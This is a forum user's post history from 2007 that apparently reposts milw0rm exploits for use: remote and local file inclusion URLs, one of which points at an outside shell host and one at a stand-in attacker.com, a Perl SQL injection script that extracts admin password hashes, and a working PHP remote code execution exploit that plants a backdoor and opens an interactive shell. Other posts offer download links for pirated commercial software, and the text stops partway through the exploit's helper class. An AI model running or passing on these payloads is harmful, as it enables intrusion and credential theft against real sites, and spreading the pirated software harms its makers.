Everything posted by Ras

  1. Author       : M.Hasran Addahroni
     Web          : http://echo.or.id/adv/adv67-K-159-2007.txt
     Critical Lvl : Dangerous

     Affected software description:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     Application : WEBO (Web Organizer)
     version     : 1.0
     Vendor      : http://sourceforge.net/projects/weborganizer/
     Description : WEBO (Web Organizer) is an open-source Web application suite providing a groupware calendar, a personal address book, a shared contacts directory, and a personal desktop page.
     ---------------------------------------------------------------------------

     Vulnerability:
     ~~~~~~~~~~~~~
     - Invalid include function at modules/abook/foldertree.php :

     ---------------foldertree.php--------------------------------------
     <?php
     /* memento :
     TreeFolder( $label, $url="", $target="", $icon = "", $id="", $options="" )
     TreeItem( $label, $url, $target="", $icon="", $options="" )
     */
     include_once( "$baseDir/lib/HTML/tree.php");
     ...
     ------------------------------------------------------------------

     Variables $baseDir are not properly sanitized. When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.

     Poc/Exploit:
     ~~~~~~~~~
     http://www.target.com/[webo_path]/modules/abook/foldertree.php?baseDir==http://attacker.com/evil?

     Solution:
     ~~~~~~
     - Sanitize variable $config_dir on affected files.
     - Turn off register_globals
     ---------------------------------------------------------------------------
  2. # telltarget CMS 1.3.3 <= Multiple Remote File Inclusion Vulnerabilities
     # D.Script: http://www.telltargetcms.de/download/telltarget_1.3.3.zip
     # Discovered by: GolD_M = [Mahmood_ali]
     # Homepage: http://www.Tryag.Com/cc
     # Exploit:[Path]/phplib/site_conf.php?ordnertiefe=Shell
     # Exploit:[Path]/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=Shell
     # Exploit:[Path]/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=Shell
     # Exploit:[Path]/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=Shell
     # Exploit:[Path]/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=Shell
     # Exploit:[Path]/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=Shell
     # Exploit:[Path]/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=Shell
     # Exploit:[Path]/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=Shell
     # Exploit:[Path]/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=Shell
     # Exploit:[Path]/phplib/version/1.3.3/module/referenz.php?tt_docroot=Shell
     # Exploit:[Path]/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=Shell
     # Exploit:[Path]/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=Shell
     # Greetz To: Tryag-Team ....&&&

     # milw0rm.com [2007-05-09]
  3. #!/usr/bin/perl -w ################################################################################# # # # SimpleNews <= 1.0.0 FINAL SQL Injection Exploit # # # # Discovered by: Silentz # # Payload: Admin Username & Hash Retrieval # # Website: [url]http://www.No_Advertising.com[/url] # # # # Vulnerable Code (print.php): # # # # $news_id = $_GET['news_id']; # # $query = "SELECT * FROM simplenews_articles WHERE news_id = '$news_id'"; # # # # PoC: http://victim.com/print.php?news_id=-999' UNION SELECT 0,username, # # password,0,0,0,0,0 FROM simplenews_users WHERE user_id=1 /* # # # # Subject To: magic_quotes_gpc set to off # # GoogleDork: Get your own! # # # # Shoutz: The entire No_Advertising community # # # ################################################################################# use LWP::UserAgent; if (@ARGV < 1){ print "-------------------------------------------------------------------------\r\n"; print " SimpleNews <= 1.0.0 FINAL SQL Injection Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; print "Usage: No_Advertising.pl [PATH]\r\n\r\n"; print "[PATH] = Path where SimpleNews is located\r\n\r\n"; print "e.g. No_Advertising.pl http://victim.com/simplenews/\r\n"; print "-------------------------------------------------------------------------\r\n"; print " http://www.No_Advertising.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; exit(); } $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $ARGV[0] . 
"print.php?news_id=-999' UNION SELECT 0,username,password,0,0,0,0,0 FROM simplenews_users WHERE user_id=1 /*"; $res = $b->request(HTTP::Request->new(GET=>$host)); $res->content =~ /([0-9a-fA-F]{32})/; print "-------------------------------------------------------------------------\r\n"; print " SimpleNews <= 1.0.0 FINAL SQL Injection Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; print "[+] Admin User = ".$res->title, "\r\n"; print "[+] Admin Hash = $1\r\n"; print "-------------------------------------------------------------------------\r\n"; print " http://www.No_Advertising.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; else {print "\nExploit Failed...\n";} # milw0rm.com [2007-05-09]
  4. #AForum =>1.33 Remote file inclusion (Func.php)
     #Download Script : http://www.agner.org/software/msgbrd2/aforum.zip
     #Thanks Str0ke
     #D0rk:allintitle:List of messageboards
     #Exploit :
     #http://localhost/[aforum_path]/common/func.php?CommonAbsDir=shell.txt?
     #Discovered By : ThE TiGeR
     #Greetz : Reda, ™~${{BraveHeart}}$~™
     #Miro_Tiger100[at]Hotmail[dot]com

     # milw0rm.com [2007-05-09]
  5. #Miplex2 Remote file inclusion
     #Download script : http://download.berlios.de/miplex2/miplex2alpha.tar.gz
     #Thanks Str0ke
     #Exploit :
     #http://victim.com/[miplex2_paht]/lib/smarty/SmartyFU.class.php?system[smarty][dir]=shell.txt?
     #Discovered by : ThE TiGeR
     #Greetz : Reda, ™~${{BraveHeart}}$~™
     #Miro_Tiger[at]Hotmail[dot]com

     # milw0rm.com [2007-05-08]
  6. <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>phpMyPortal 3.0.0 RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</title> <script language="JavaScript"> //'=============================================================================================== //'[Script Name: phpMyPortal (22 acc.s) (Version 3.0.0 RC3 du 05/05/2007) //'[Ex : [Path_Script]/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=Shell //'[Author : Mahmood_ali //'[S.Page : [url]http://phpmyportal.info/menu.php[/url] <= Click T.l.chargez phpMyPortal //'[$$ : Free //'=============================================================================================== //'[[V.Code]]------------------------------------------------------ //' //'require_once($GLOBALS['CHEMINMODULES'].'/forum/inc/nouvelle.inc.php'); //' //'[[V.Code]]--------------------------------------------------------- //# Tryag.Com //# ... //Basic exploit,but any time : ( var path="/inc/" var adres="/articles.inc.php?" //File name var acik ="GLOBALS[CHEMINMODULES]=" // Line 67 var shell="http://www.spy-art.com/xx.txt?" 
// Shell Tryag-Team function command(){ if (document.rfi.target1.value==""){ alert("Failed.."); return false; } rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready rfi.submit(); // Form Submit } </script> </head> <body bgcolor="#000000"> <center> [b]<font face="Arial" size="2" color="#FFFFFF">phpMyPortal 3.0.0 RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</font>[/b]</p> </p> <form method="post" target="getting" name="rfi" onSubmit="command();"> [b]<font face="Tahoma" size="1" color="#FF0000">Target:</font><font face="Tahoma" size="1" color="#FFFF00">[[url]http://[target]/[/url][scriptpath]</font><font color="#00FF00" size="2" face="Tahoma"> </font><font color="#FF0000" size="2"></font>[/b] <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p> <input type="submit" value="Gonder" name="B1"><input type="reset" value="Sifirla" name="B2"></p> </form> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe> </p> [b]<font face="Lucida Handwriting" size="5" color="#FF0000">Mahmood_ali</font>[/b] [b]<a href="http://tryag.com/cc"> <font face="Lucida Handwriting" size="5" color="#FFFFFF">Tryag.-Team</font></a>[/b]</p> </p> </center> </body> </html> # milw0rm.com [2007-05-09]
  7. The thing is, on other forums I see people posting stuff from milw0rm, and I thought I'd post here too... I'll keep putting up exploits.
  8. I put up a few of the exploits from milw0rm because nobody posts any exploit, nothing... I won't post any more from today on...
  9. AusLogics BoostSpeed 3.6.9.660 AusLogics BoostSpeed - the ideal solution to keep your PC running faster, cleaner and error-free. This powerful optimization suite will boost Internet connections, tweak Windows to its peak performance, clean registry and block annoying ads. It's a great way to keep your computer clean and optimized. Speed Up PC With BoostSpeed Modify Windows settings, file system and services to greatly increase system performance. Increase startup and shutdown speed, disable annoying CD autorun and error reporting features. BoostSpeed will keep monitoring your system for possible optimizations and let you know if such optimizations are possible. You can also run the System Optimization Wizard to periodically optimize your PC. Speed Up Internet Adjust your PC for faster images, music and software downloads, increased browsing speed and reliable Internet connections. View your download speed and graphs. To gain additional performance boost you can also turn on DNS Optimization. Block Banner Advertisements Tired of annoying banner advertisements accompanying many web sites? Now you can eliminate advertisements and also speed up your Internet browsing with BoostSpeed Banner Killer! You can add your own web sites to the black list to block them from showing their advertisements. Keep Disk and Registry Clean Get rid of junk on the disks and registry of your PC. Remove hazardous and space-wasting files left by untidy programs and crashes of your system. Dramatically increase the performance of your PC by cleaning, optimizing and defragmenting local disks and registry. Optimize Memory and Appearance Badly written applications constantly steal memory without giving it back. That's why your PC becomes unstable with time and you have to reboot. BoostSpeed automatically frees up computer memory to gain additional performance boost. You can also manually recover memory and clipboard. 
Keep your PC fast and safe BoostSpeed will detect most of the popular "PC-slowers" - bundle-software (such as eDonkey or Kazaa) which silently download malware and spyware to your computer, taking up internet traffic and slowing down the system. This will also keep your system safe from prying eyes of spyware programs. Boost Software Products BoostSpeed can improve performance of different software products, including Microsoft Office, Internet browsers (such as Internet Explorer, Opera, Mozzila), E-mail clients (Outlook, The Bat), MSN Messenger, ICQ, Media Player and others. System Optimization Tools Greatly increase your PC startup speed with Autorun Manager, where you can disable or remove the programs which try to load up when Windows starts up. Force-uninstall unwanted software products which take up space on your computer and slow it down. Networks Tools Keep your connection alive while you're away, synchronize your computer clock with atomic clock over the Internet, lookup domain names and IP addresses, measure your Internet connection speed. Troubleshoot and improve your Internet connection and local network with an excellent selection of network management tools. Download: http://rapidshare.com/files/30168483/AusLogics_BoostSpeed_3.6.9.660.rar
  10. Sammsoft Advanced Registry Optimizer 5.1Retail Get Advanced Registry Optimizer 5 for top PC performance results. Clean and fix* your PC registry problems now Help keep your PC operating smoothly by using Advanced Registry Optimizer 5 to scan, identify, clean and repair errors in your Windows registry with a single click. Advanced Registry Optimizer can clean and repair unwanted debris left behind by adware and spyware. This top-rated registry tool is extremely powerful, yet easy to use, and will keep your computer operating in "like new" fashion. Advanced Registry Optimizer uses Intellismart technology to scan more than 10 important parts of the registry. It can identify and correct errors that can slow your system down or, cause it to behave erratically, crash or hang. For maximum safety, Advanced Registry Optimizer includes Backup and Undo functionality for any change. Advanced users can select which parts of the registry to operate on. Features of Advanced Registry Optimizer Registry Cleaner deep-scans 12 broad categories: Active X OLE COM Sections User Software Settings System Software Settings Shared DLL's Section Fonts Section Invalid File Associations Run Sections Sound and Applets Uninstall Section Help Section Virtual Device Drivers and Services Application Paths Section Safety Features Backup and Undo Functionality Ability to jump directly to the registry in order to verify all entries from Registry Cleaner and Fixer Detailed date and time log for tracking what changes were made to the registry. Easy and Safe Advanced Registry Optimizer is easy and safe. Version: Supported Operating Systems Windows XP, ME, 2000/2003/NT Download: http://rapidshare.com/files/30167706/Sammsoft_5.1.rar
  11. ZoneAlarm Pro 7.0.337.000 ZoneAlarm Pro 7.0 augments your existing Antivirus solutions. ZoneAlarm Pro adds powerful, multi-layered security and additional protection. Includes Operating System Firewall, Network and Program Firewall, Anti-Spyware, Identity Theft Protection. The latest release improves the Operating System Firewall and applies more robust spyware detection and removal functions. Version 7.0 includes anti-spyware. The Most Secure Firewall with Privacy and Identity Protection Delivers proactive firewall protection. Proactively protects your PC with the most advanced, multi-layered, firewall-based security available. Prevents and removes spyware. Stops spyware before it gets on your PC, removes spyware already on it, and offers extra protection from dangerous websites. -Protects your privacy and identity. -Stops hackers and criminals from stealing your identity or financial assets. -Network and Program Firewall Delivers proactive firewall protection with multiple layers of security that stop inbound, outbound, and program attacks while remaining completely invisible to hackers. Guards the network perimeter from inbound and outbound threats with the world's #1 firewall Prevents spyware and other malicious programs from sending your personal information across the Internet Full stealth mode to keep you concealed from anyone on the Internet Protects your programs from malware Operating System Firewall (OSFirewall™) IMPROVED This additional layer of security prevents hard-to-remove spyware, including rootkits and kernel-level threats, from getting onto your PC and causing damage. 
Identify and filter over 100,000 applications for constant protection against threats Monitor program installation, registry changes and file access down to your PC's core Monitor additional program actions for more thorough protection Prevents malicious software from damaging files in your core Windows operating system Identity Theft Protection While ZoneAlarm continues to secure your identity information on your PC, these new Identity Theft Protection services also prevent identity theft over the Internet and even in the physical world. Learn More Stops pre-approved credit card offers, which contain sensitive financial data often used by criminals for identity theft (offered via a credit industry service - US only) Detects theft by monitoring both cyberspace and stolen credit card lists from vendors, consumers, and the underground. Alerts you if your credit cards are Provides a low-cost, public records report to alert you of fraud, such as phony DMV records (US only) Assists identity theft victims with personal telephone counseling to guide them through resolution and recovery (US only) Offers identity theft education and tools to help you prevent, detect and recover from identity theft Anti-Spyware IMPROVED More robust detection and removal functions perform deeper scans at every level and purge spyware from your PC. Ability to remove even the most persistent, hard-to-find spyware that infiltrate your PC at the core level Privacy Protection Manages and blocks pop-up ads, online profiling, cookies, cache, and scripts so you can surf in peace. Game Mode One-click control temporarily suppresses most security alerts and prevents them from interrupting your fun while maintaining maximum protection for your PC. Essential Email Security Quarantines suspicious attachments to help defend against unknown viruses; automatically halts outbound messages to keep you from accidentally infecting others. 
Wireless PC Protection Automatically detects wireless networks and secures your PC from hackers and other Internet threats wherever you're connected - at home or on the road. SmartDefense™ Service Provides your PC with real-time security updates, improved response to breaking spyware threats, and new attack protection capabilities. SmartDefense Advisor automatically adjusts your security settings for maximum protection against the latest virus and spyware outbreaks Includes DefenseNet, an early warning system that gathers data from the Zone Labs user community on the latest spyware and malware outbreaks Leverages this vast user knowledge by including it in signature updates that protect your PC from the latest spyware attacks Download: http://rapidshare.com/files/30167282/ZoneAlarmPro7.0.337.000.rar
  12. I had some things to do, cein, and I couldn't be at the computer, so I couldn't tell you colors or things like that... anyway, I had no particular demands. I wanted an avatar the way you're able to make one. Thanks for the avatar you made me! EDIT: it came out nicely with that "ras" in the corner; the R is not very legible.
  13. spiry posted this on 12 Aug 2006 06:34 pm ... and now we are in 2007
  14. #Berylium2 Remote file inclusion
      #Download script : http://berylium.org/source/be2-2003-08-18.tar.gz
      #Thanks Str0ke
      #Exploit :
      #http://victim.com/[berylium2_path]/code/berylium-classes.php?beryliumroot=shell.txt?
      #Discovered by : ThE TiGeR
      #Miro_Tiger[at]hotmail[dot]com
      #Greetz : ™~${{BraveHeart}}$~™

      # milw0rm.com [2007-05-07]

      A bit old, but it works.
  15. #DynamicPAD Remote file inclusion (HomeDir)
      #Download script : http://dynamicpad.org/dp.tar.gz
      #Thanks Str0ke
      #Dork : "Powered By DynamicPAD"
      #Exploit :
      #http://victim.com/[dp_path]/dp_logs.php?HomeDir=shell.txt?
      #http://victom.com/[dp_path]/index.php?HomeDir= shell.txt?
      #Discovered by : ThE TiGeR
      #Miro_Tiger[at]Hotmail[dot]com

      # milw0rm.com [2007-05-07]
  16. # BeyazKurt - B3yazKurt@Hotmail.Com
      #
      # ACGV Annu (rubrik) Local File Inclusion Exploit
      #
      # Lamers are roaming around everywhere, so watch out! Don't run into a Tr0jan accident !!
      #
      # Www.HackSafety.Com // A new era in hacking ...
      #
      # HackSafety.Com & WorldHackerz.Net brotherhood...
      #
      # rerere rararara bjk bjk MUAHAHAH
      #
      # They carve the cup out of stone, oh they carve it, this is how it goes for Beşiktaş ... for bjk ... !!
      #
      # Download : http://www.phpscripts-fr.net/scripts/download.php?id=1107

      /theme/acgv.php?rubrik=../../../etc/passwd%00

      # milw0rm.com [2007-05-07]
  17. # Friendly 1.0d1 (friendly_path)Remote File Inclusion Vulnerabilities
      # D.Script: http://friendlyphp.org/downloads/
      # Discovered by: GolD_M = [Mahmood_ali]
      # Homepage: http://www.Tryag.cc
      # Exploit:[Path]/_friendly/core/data/_load.php?friendly_path=shell
      # Exploit:[Path]/_friendly/core/data/yaml.inc.php?friendly_path=shell
      # Exploit:[Path]/_friendly/core/display/_load.php?friendly_path=shell
      # Exploit:[Path]/_friendly/core/support/_load.php?friendly_path=shell
      # Greetz To: Tryag-Team ....##

      # milw0rm.com [2007-05-06]
  18. <?php # # Nuked-klaN 1.7.6 Remote Code Execution Exploit # ------------------------------------------------ # Author: DarkFig <gmdarkfig@gmail.com> # Website: [url]http://www.acid-root.new.fr/[/url] # PHP conditions: None =] # Private since 2 months. # error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class. $xpl = new phpsploit(); $url = 'http://localhost/nk/'; # url $prx = ''; # proxy <proxyip>:<proxyport> $pra = ''; # basic authentification <proxyuser:proxypwd> $xpl->agent("Firefox"); $xpl->allowredirection(0); $xpl->cookiejar(0); if($prx) $xpl->proxy($prx); if($pra) $xpl->proxyauth($pra); $config = array(); $config[] = 'nuked'; # table prefix $config[] = 'nuked'; # cookie prefix $config[] = 'ORDER by date LIMIT 1'; # sql conditions $config[] = 'HAK'; # match, length <= 3 $config[] = '<?php'."\n" # php code .'error_reporting(0);' .'if(isset($_SERVER[HTTP_SHELL]))' .'{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' .'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>'; $request = array(); $request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users $config[2]),'$config[3]0'"; $request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users $config[2]),'$config[3]1'"; $request[] = "'$config[3]2',(SELECT id FROM $config[0]_users $config[2]),'$config[3]2'"; $request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'"; for($i=0;$i<count($request);$i++) { $deb = rand(0,10000)."',2,".(time()+500000).",'',(SELECT CONCAT("; $sql = $deb.$request[$i]."))) #"; $xpl->addheader("X-Forwarded-For",$sql); $xpl->get($url); $xpl->reset('header'); } if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$xpl->getcontent(),$matches)) die("Exploit Failed"); $what = array("login","passwd","user_id","session"); for($i=0;$i<count($what);$i++) print "\n".$what[$i]." 
-> ".$matches[2][$i]; if(empty($matches[2][3])) exit("\nNo session found"); # Logged in as admin $name = array("admin_session","user_id","sess_id"); $xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]); $xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]); $xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]); $phpc = array( frmdt_url => $url.'?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4])); $xpl->addheader('Referer',$url); $xpl->formdata($phpc); $xpl->get($url.'?file=User&op=edit_pref'); if(!preg_match('#\<input name=\"photo\" value=\"(\S+)\"#',$xpl->getcontent(),$match)) exit("\nNo file found"); else print "\n\$shell> "; $sql = array(); $sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/* $sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/ $sql[] = "UPDATE $config[0]_block SET type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;"; $sql[] = "DELETE FROM $config[0]_nbconnecte;"; for($i=0;$i<count($sql);$i++) $xpl->post($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]); while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) { # 0'); include('./conf.inc.php'); print $global['db_pass']; // $xpl->reset('header'); $xpl->addheader('Shell',"system('$cmd');"); $xpl->get($url); $data = explode('123456789',$xpl->getcontent()); print $data[1]."\n\$shell> "; } function char($data) { $char='CHAR('; for($i=0;$i<strlen($data);$i++) { $char .= ord($data[$i]); if($i != (strlen($data)-1)) $char .= ','; } return $char.')'; } /* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. 
* * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * TITLE: PhpSploit Class * REQUIREMENTS: PHP 5 (remove "private", "public" if you have PHP 4) * VERSION: 1.2 * LICENSE: GNU General Public License * ORIGINAL URL: [url]http://www.acid-root.new.fr/tools/03061230.txt[/url] * FILENAME: phpsploitclass.php * * CONTACT: [email]gmdarkfig@gmail.com[/email] (french / english) * GREETZ: Sparah, Ddx39 * * DESCRIPTION: * The phpsploit is a class implementing a web user agent. * You can add cookies, headers, use a proxy server with (or without) a * basic authentification. It supports the GET and the POST method. It can * also be used like a browser with the cookiejar() function (which allow * a server to add several cookies for the next requests) and the * allowredirection() function (which allow the script to follow all * redirections sent by the server). It can return the content (or the * headers) of the request. Others useful functions can be used for debugging. * A manual is actually in development but to know how to use it, you can * read the comments. * * CHANGELOG: * [2007-01-24] (1.2) * * Bug #2 fixed: Problem concerning the getcookie() function ((| * * New: multipart/form-data enctype is now supported * * [2006-12-31] (1.1) * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) * * New: You can now call the getheader() / getcontent() function without parameters * * [2006-12-30] (1.0) * * First version * */ class phpsploit { /** * This function is called by the get()/post() functions. * You don't have to call it, this is the main function. 
* * @return $server_response */ private function sock() { if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport); else $socket = fsockopen($this->host,$this->port); if(!$socket) die("Error: The host doesn't exist"); if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n"; elseif($this->method==="post" or $this->method==="formdata") $this->packet = "POST ".$this->url. " HTTP/1.1\r\n"; else die("Error: Invalid method"); if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n"; $this->packet .= "Host: ".$this->host."\r\n"; if(!empty($this->agent)) $this->packet .= "User-Agent: ".$this->agent."\r\n"; if(!empty($this->header)) $this->packet .= $this->header."\r\n"; if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n"; $this->packet .= "Connection: Close\r\n"; if($this->method==="post") { $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data."\r\n"; } elseif($this->method==="formdata") { $this->packet .= "Content-Type: multipart/form-data; boundary=---------------------------".$this->boundary."\r\n"; $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data; } $this->packet .= "\r\n"; $this->recv = ''; fputs($socket,$this->packet); while(!feof($socket)) $this->recv .= fgets($socket); fclose($socket); if($this->cookiejar) $this->cookiejar($this->getheader($this->recv)); if($this->allowredirection) return $this->allowredirection($this->recv); else return $this->recv; } /** * This function allows you to add several cookie in the * request. 
Several methods are supported: * * $this->addcookie("name","value"); * or * $this->addcookie("name=newvalue"); * or * $this->addcookie("othername=overvalue; xx=zz; y=u"); * * @param string $cookiename * @param string $cookievalue * */ public function addcookie($cookn,$cookv='') { // $this->addcookie("name","value"); work avec replace if(!empty($cookv)) { if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete if(!empty($this->cookie)) { if(preg_match("/$cookn=/",$this->cookie)) { $this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie); } else { $this->cookie .= " ".$cookn."=".$cookv.";"; // " ". } } else { $this->cookie = $cookn."=".$cookv.";"; } } // $this->addcookie("name=value; othername=othervalue"); else { if(!empty($this->cookie)) { $cookn = preg_replace("/(.*);$/","$1",$cookn); $cookarr = explode(";",str_replace(" ", "",$cookn)); for($i=0;$i<count($cookarr);$i++) { preg_match("/(\S*)=(\S*)/",$cookarr[$i],$matches); $cookn = $matches[1]; $cookv = $matches[2]; $this->addcookie($cookn,$cookv); } } else { $cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";"; $this->cookie = $cookn; } } } /** * This function allows you to add several headers in the * request. 
     * Several methods are supported:
     *
     * $this->addheader("headername","headervalue");
     * or
     * $this->addheader("headername: headervalue");
     *
     * @param string $headername
     * @param string $headervalue
     */
    public function addheader($headern,$headervalue='')
    {
        // $this->addheader("name","value");
        if(!empty($headervalue)) {
            if(!empty($this->header)) {
                if(preg_match("/$headern:/",$this->header)) {
                    $this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header);
                } else {
                    $this->header .= "\r\n".$headern.": ".$headervalue;
                }
            } else {
                $this->header=$headern.": ".$headervalue;
            }
        }
        // $this->addheader("name: value");
        else {
            if(!empty($this->header)) {
                $headarr = explode(": ",$headern);
                $headern = $headarr[0];
                $headerv = $headarr[1];
                $this->addheader($headern,$headerv);
            } else {
                $this->header=$headern;
            }
        }
    }

    /**
     * This function allows you to use an http proxy server.
     * Several methods are supported:
     *
     * $this->proxy("proxyip","8118");
     * or
     * $this->proxy("proxyip:8118")
     *
     * @param string $proxyhost
     * @param integer $proxyport
     */
    public function proxy($proxy,$proxyp='')
    {
        // $this->proxy("localhost:8118");
        if(empty($proxyp)) {
            preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr);
            $proxh = $proxarr[1];
            $proxp = $proxarr[2];
            $this->proxyhost=$proxh;
            $this->proxyport=$proxp;
        }
        // $this->proxy("localhost",8118);
        else {
            $this->proxyhost=$proxy;
            $this->proxyport=intval($proxyp);
        }

        if($this->proxyport > 65535)
            die("Error: Invalid port number");
    }

    /**
     * This function allows you to use an http proxy server
     * which requires basic authentication. Several
     * methods are supported:
     *
     * $this->proxyauth("darkfig","dapasswd");
     * or
     * $this->proxyauth("darkfig:dapasswd");
     *
     * @param string $proxyuser
     * @param string $proxypass
     */
    public function proxyauth($proxyauth,$proxypasse='')
    {
        // $this->proxyauth("darkfig:password");
        if(empty($proxypasse)) {
            preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr);
            $proxu = $proxautharr[1];
            $proxp = $proxautharr[2];
            $this->proxyuser=$proxu;
            $this->proxypass=$proxp;
        }
        // $this->proxyauth("darkfig","password");
        else {
            $this->proxyuser=$proxyauth;
            $this->proxypass=$proxypasse;
        }
    }

    /**
     * This function allows you to set the "User-Agent" header.
     * Several methods are possible to do that:
     *
     * $this->agent("Mozilla Firefox");
     * or
     * $this->addheader("User-Agent: Mozilla Firefox");
     * or
     * $this->addheader("User-Agent","Mozilla Firefox");
     *
     * @param string $useragent
     */
    public function agent($useragent)
    {
        $this->agent=$useragent;
    }

    /**
     * This function returns the header which will be
     * in the next request.
     *
     * $this->showheader();
     *
     * @return $header
     */
    public function showheader()
    {
        return $this->header;
    }

    /**
     * This function returns the cookie which will be
     * in the next request.
     *
     * $this->showcookie();
     *
     * @return $storedcookies
     */
    public function showcookie()
    {
        return $this->cookie;
    }

    /**
     * This function returns the last formed
     * http request (the http packet).
     *
     * $this->showlastrequest();
     *
     * @return $last_http_request
     */
    public function showlastrequest()
    {
        return $this->packet;
    }

    /**
     * This function sends the formed http packet with the
     * GET method. You can specify the port of the host.
     *
     * $this->get("http://localhost");
     * $this->get("http://localhost:888/xd/tst.php");
     *
     * @param string $urlwithpath
     * @return $server_response
     */
    public function get($url)
    {
        $this->target($url);
        $this->method="get";
        return $this->sock();
    }

    /**
     * This function sends the formed http packet with the
     * POST method. You can specify the port of the host.
     *
     * $this->post("http://localhost/index.php","admin=1&user=dark");
     *
     * @param string $urlwithpath
     * @param string $postdata
     * @return $server_response
     */
    public function post($url,$data)
    {
        $this->target($url);
        $this->method="post";
        $this->data=$data;
        return $this->sock();
    }

    /**
     * This function sends the formed http packet with the
     * POST method using the multipart/form-data enctype.
     *
     * $array = array(
     *     "frmdt_url" => "http://localhost/upload.php",
     *     "frmdt_boundary" => "123456", # Optional
     *     "email" => "me@u.com",
     *     "varname" => array(
     *         "frmdt_type" => "image/gif", # Optional
     *         "frmdt_transfert" => "binary", # Optional
     *         "frmdt_filename" => "hello.php",
     *         "frmdt_content" => "<?php echo ''; ?>"));
     * $this->formdata($array);
     *
     * @param array $array
     * @return $server_response
     */
    public function formdata($array)
    {
        // The frmdt_* keys are quoted: bare constants as array keys fail on current PHP
        $this->target($array["frmdt_url"]);
        $this->method="formdata";
        $this->data='';

        if(!isset($array["frmdt_boundary"])) $this->boundary="phpsploit";
        else $this->boundary=$array["frmdt_boundary"];

        foreach($array as $key => $value) {
            if(!preg_match("#^frmdt_(boundary|url)#",$key)) {
                $this->data .= "-----------------------------".$this->boundary."\r\n";
                $this->data .= "Content-Disposition: form-data; name=\"".$key."\";";

                if(!is_array($value)) {
                    $this->data .= "\r\n\r\n".$value."\r\n";
                } else {
                    $this->data .= " filename=\"".$array[$key]["frmdt_filename"]."\";\r\n";
                    if(isset($array[$key]["frmdt_type"]))
                        $this->data .= "Content-Type: ".$array[$key]["frmdt_type"]."\r\n";
                    if(isset($array[$key]["frmdt_transfert"]))
                        $this->data .= "Content-Transfer-Encoding: ".$array[$key]["frmdt_transfert"]."\r\n";
                    $this->data .= "\r\n".$array[$key]["frmdt_content"]."\r\n";
                }
            }
        }
        $this->data .= "-----------------------------".$this->boundary."--\r\n";
        return $this->sock();
    }

    /**
     * This function returns the content of the server response
     * without the headers.
